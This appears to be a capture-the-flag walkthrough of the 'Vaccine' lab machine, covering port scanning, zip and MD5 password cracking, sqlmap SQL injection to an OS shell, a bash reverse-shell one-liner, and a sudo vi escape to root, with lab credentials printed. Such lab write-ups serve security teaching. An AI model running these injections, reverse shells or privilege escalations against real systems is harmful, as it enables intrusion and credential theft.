Vaccine Walkthrough

After the Oopsie Walkthrough, here I'm with Vaccine box. Let's hack and grab the flags.

As I mentioned before, the starting point machines are a series of 9 easily rated machines that should be rooted in sequence. So it means, if you need to go through this box you must have a complete Oopsie machine.

Enough talks, πŸ₯± Let’s Get It Started πŸ±β€πŸ’»

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedure to grab the flags! πŸ±β€πŸ‘€

00. Start Machine …

To start machine, just click "Join Machine".

Then you can see the IP address for that machine. usually it is 10.10.10.46 🀠

Before going enumeration steps we can simply ping to the IP address and check our VPN connection and whether the machine is alive. Sometimes the machines might "Disable" ping requests from passing through the firewall. But in most cases ping will be a success! πŸ™‚

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# ping 10.10.10.46 -c 2
PING 10.10.10.46 (10.10.10.46) 56(84) bytes of data.
64 bytes from 10.10.10.46: icmp_seq=1 ttl=63 time=235 ms
64 bytes from 10.10.10.46: icmp_seq=2 ttl=63 time=234 ms

--- 10.10.10.46 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1004ms
rtt min/avg/max/mdev = 234.325/234.560/234.796/0.235 ms

As a ping result, It's TTL=63. There is only one route between machine and us (VPN). So definitely it will be a Linux machine.

01. Enumeration First …

01.1 Fast ports scan

As usual, run Nmap fast scan for all TCP ports to identify the ports which are open.

nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.46
-n  : Never do DNS resolution
-vv	: Extra verbosity
--open	: Output only open ports
-p-	: Full TCP ports range (65535)
-T4	: Aggressive (4) speeds scans; assumes you are on a reasonably fast and reliable network

Here is the output πŸ‘‡

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# nmap -n -vv --open -T4 -p- -oN AllPorts.nmap 10.10.10.46
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 23:26 EDT
Initiating Ping Scan at 23:26
Scanning 10.10.10.46 [4 ports]
Completed Ping Scan at 23:27, 0.41s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 23:27
Scanning 10.10.10.46 [65535 ports]
Discovered open port 21/tcp on 10.10.10.46
Discovered open port 22/tcp on 10.10.10.46
Discovered open port 80/tcp on 10.10.10.46
SYN Stealth Scan Timing: About 39.33% done; ETC: 23:28 (0:00:48 remaining)
Completed SYN Stealth Scan at 23:28, 77.77s elapsed (65535 total ports)
Nmap scan report for 10.10.10.46
Host is up, received reset ttl 63 (0.27s latency).
Scanned at 2021-05-19 23:26:59 EDT for 78s
Not shown: 65532 closed ports
Reason: 65532 resets
PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 63
22/tcp open  ssh     syn-ack ttl 63
80/tcp open  http    syn-ack ttl 63

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 78.44 seconds
           Raw packets sent: 79277 (3.488MB) | Rcvd: 79253 (3.170MB)

Now we know which ports are open,

01.2 Run Nmap Scripting Engine

To get the best result we can run the Nmap Scripting Engine for all open ports. Now we know all of the open ports and therefore we can point out and run the script engine as fast as possible. 

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# nmap -sV -sC -oN DetailPorts.nmap -p 21,22,80 -Pn 10.10.10.46
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-19 23:36 EDT
Nmap scan report for 10.10.10.46
Host is up (0.24s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.0p1 Ubuntu 6build1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA)
|   256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA)
|_  256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: MegaCorp Login
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.44 seconds

There are 3 main ports. Look at the SSH version info, the machine flavor is Ubuntu Eoan. And also some website is running on port 80 and Nmap indicate it as MegaCrop Login. Let's look what is inside ftp first.

01.3 Discover more on port 21

Do you remember that we had some ftp credentials from our previous box(Oopsie)? So, let’s use them and check the login to ftp service.

  • ftpuser : mc@F1l3ZilL4

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# ftp 10.10.10.46
Connected to 10.10.10.46.
220 (vsFTPd 3.0.3)
Name (10.10.10.46:root): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>

We successfully logged in to the ftp server as ftpuser. Again let's enumerate to find any other thing.

ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0            2533 Feb 03  2020 backup.zip
226 Directory send OK.

There is a backup.zip file in this ftp server. Before we check what is inside that zip file, we are going to download it to our machine.

we can use get filename command to download any file from ftp server. Click here if you need learn ftp basic commands. 😎😎

ftp> get backup.zip
local: backup.zip remote: backup.zip
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for backup.zip (2533 bytes).
226 Transfer complete.
2533 bytes received in 0.00 secs (8.5359 MB/s)

We can use unzip for extract any basic zip file. Here we can see index.php file but the zip file is protected by some kind of password.

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# ls
AllPorts.nmap  backup.zip  DetailPorts.nmap

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:

We can check passwords from previous machines but trust me nothing works. It means we need to crack that zip file and grab the password. There are so many tools to crack zip file password. But I prefer using fcrackzip

To install fcrackzip, type the following command and hit enter. 😁😁

 apt-get install fcrackzip

If you are on your very first time to use rockyou word list, you need to extract it. 

gunzip /usr/share/wordlists/rockyou.txt.gz
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip
-u	: Use unzip to weed out wrong passwords
-D	: Use a dictionary
-p	: Use string as initial password/file

Here is the output πŸ‘‡

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt backup.zip


PASSWORD FOUND!!!!: pw == 741852963

As you can feel it's too fast than using John the Ripper, isn't it? Now we have password, so... let's unzip that archive to get index.php file. 

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# unzip backup.zip
Archive:  backup.zip
[backup.zip] index.php password:
  inflating: index.php
  inflating: style.css

Oh! there is a css file also. First of all, check index.php file.

β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# head index.php
<!DOCTYPE html>
<?php
session_start();
  if(isset($_POST['username']) && isset($_POST['password'])) {
    if($_POST['username'] === 'admin' && md5($_POST['password']) === "2cb42f8734ea607eefed3b70af13bbd3") {
      $_SESSION['login'] = "true";
      header("Location: dashboard.php");
    }
  }
?>

By looking at the very first lines, we can see the credentials. But here, the password is in md5 hash format. Let's try to decode it using online crackstation site.

Oh! what a simple password. So now the credentials are,

  • admin : qwerty789

01.4 Discover more on port 80

Now let's jump to the port 80, Here we have MegaCrop login page and now we have the credentials. Let's use it to login. What the hell, I think we could simply get that password if we brute forced that login page using rockyou password list. Isn't it? πŸ€¦β€β™‚οΈ

Finally, we have only one function on this site and it is search option. Let's fire up Burp Suite and check what are the requests going through.

When looking at the request, a lot of vulnerabilities came to my head but nothing worked except SQL Injection.

02. Foothold

Let's jump to sqlmap . As you can see here, the request is a GET request. You can simply add * to your value of parameter (in this case it is search) which you want to scan. But keep in mind that we now have access to the system. It means, to use search function you must need a valid session token. So we are going to pass the PHPSESSID as a cookie parameter. 

sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --dbs --batch
--dbs	: get the database list
--batch	: Never ask for user input, use the default behavior

Click here If you need SQLMap Cheat Sheet

Here is the output πŸ‘‡πŸ‘‡

When looking at the output we can see that there are 3 main databases. You can enumerate all the tables and fetch data from the databases.

02.1 Get User Shell

There are 2 main ways to get user shell in this box.

  1. Using SQLMap --os-shell command.

  2. Enumerating all the tables.

Here I will show the 1st step: We could use the SQLMap flag --os-shell to gain a shell and after that gain an upgraded reverse shell with the next commands. However I lost the connection sometimes with this method. Anyway first try it out. It's very simple, type bellow command on your terminal.

sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --os-shell --batch

Then your shell will look like this πŸ‘‡πŸ‘‡

Now, time to upgrade that ugly shell. πŸŽ…πŸŽ… Start netcat listener on whatever port you like (In this case it's 4848) and run below command on os-shell.πŸ‘‡

bash -c 'bash -i &>/dev/tcp/<YourIP>/4848 <&1' &

Let's check the 2nd step: Now we need to enumerate the database and to find users and the passwords. So let's get started.

Without enumerate the table one by one we can use a simple command to find the passwords on the database using --password flag.πŸ‘΄πŸ‘΄ Pretty cool right? 🀩

sqlmap http://10.10.10.46/dashboard.php?search=* --cookie PHPSESSID=3gl7g1ujsq2i3cpigk4521lk8p --batch --passwords

So we found one user postgres and the password from md5 hash format. I tried to crack this hash with john and hashcat, however a quick google search could save some time.(Remove the 'md5' part beginning.)

No we have new credentials, let's check them trough SSH.

  • postgres :P@s5w0rd!

I don't know why it hasn't got any user flag. Then I checked statistics on this box and it showed me this.πŸ‘‡

This means we have no any user.txt in this box. Let's find root.txt.

03. Privilege Escalation …

First thing first! Let's check what are the commands that we can run as super user permission. 

sudo -l
β”Œβ”€β”€(rootπŸ’€Hidd3nWiki)-[~/Documents/Vaccine]
└─# ssh postgres@10.10.10.46                                                                                          
postgres@10.10.10.46's password:
Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-29-generic x86_64)
    <snap>
    </snap>
Last login: Thu May 20 06:33:36 2021 from 10.10.14.11
postgres@vaccine:~$ sudo -l
[sudo] password for postgres:
Matching Defaults entries for postgres on vaccine:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User postgres may run the following commands on vaccine:
    (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf
postgres@vaccine:~$

Looks like we can run the command β€œ/bin/vi /etc/postgresql/11/main/pg_hba.conf” as sudo, So by running it and adding β€œ:!/bin/bash” inside the vi editor, we got ourselves a root shell.

Find me on @twitter

PreviousOopsie WalkthroughNextShield Walkthrough

Last updated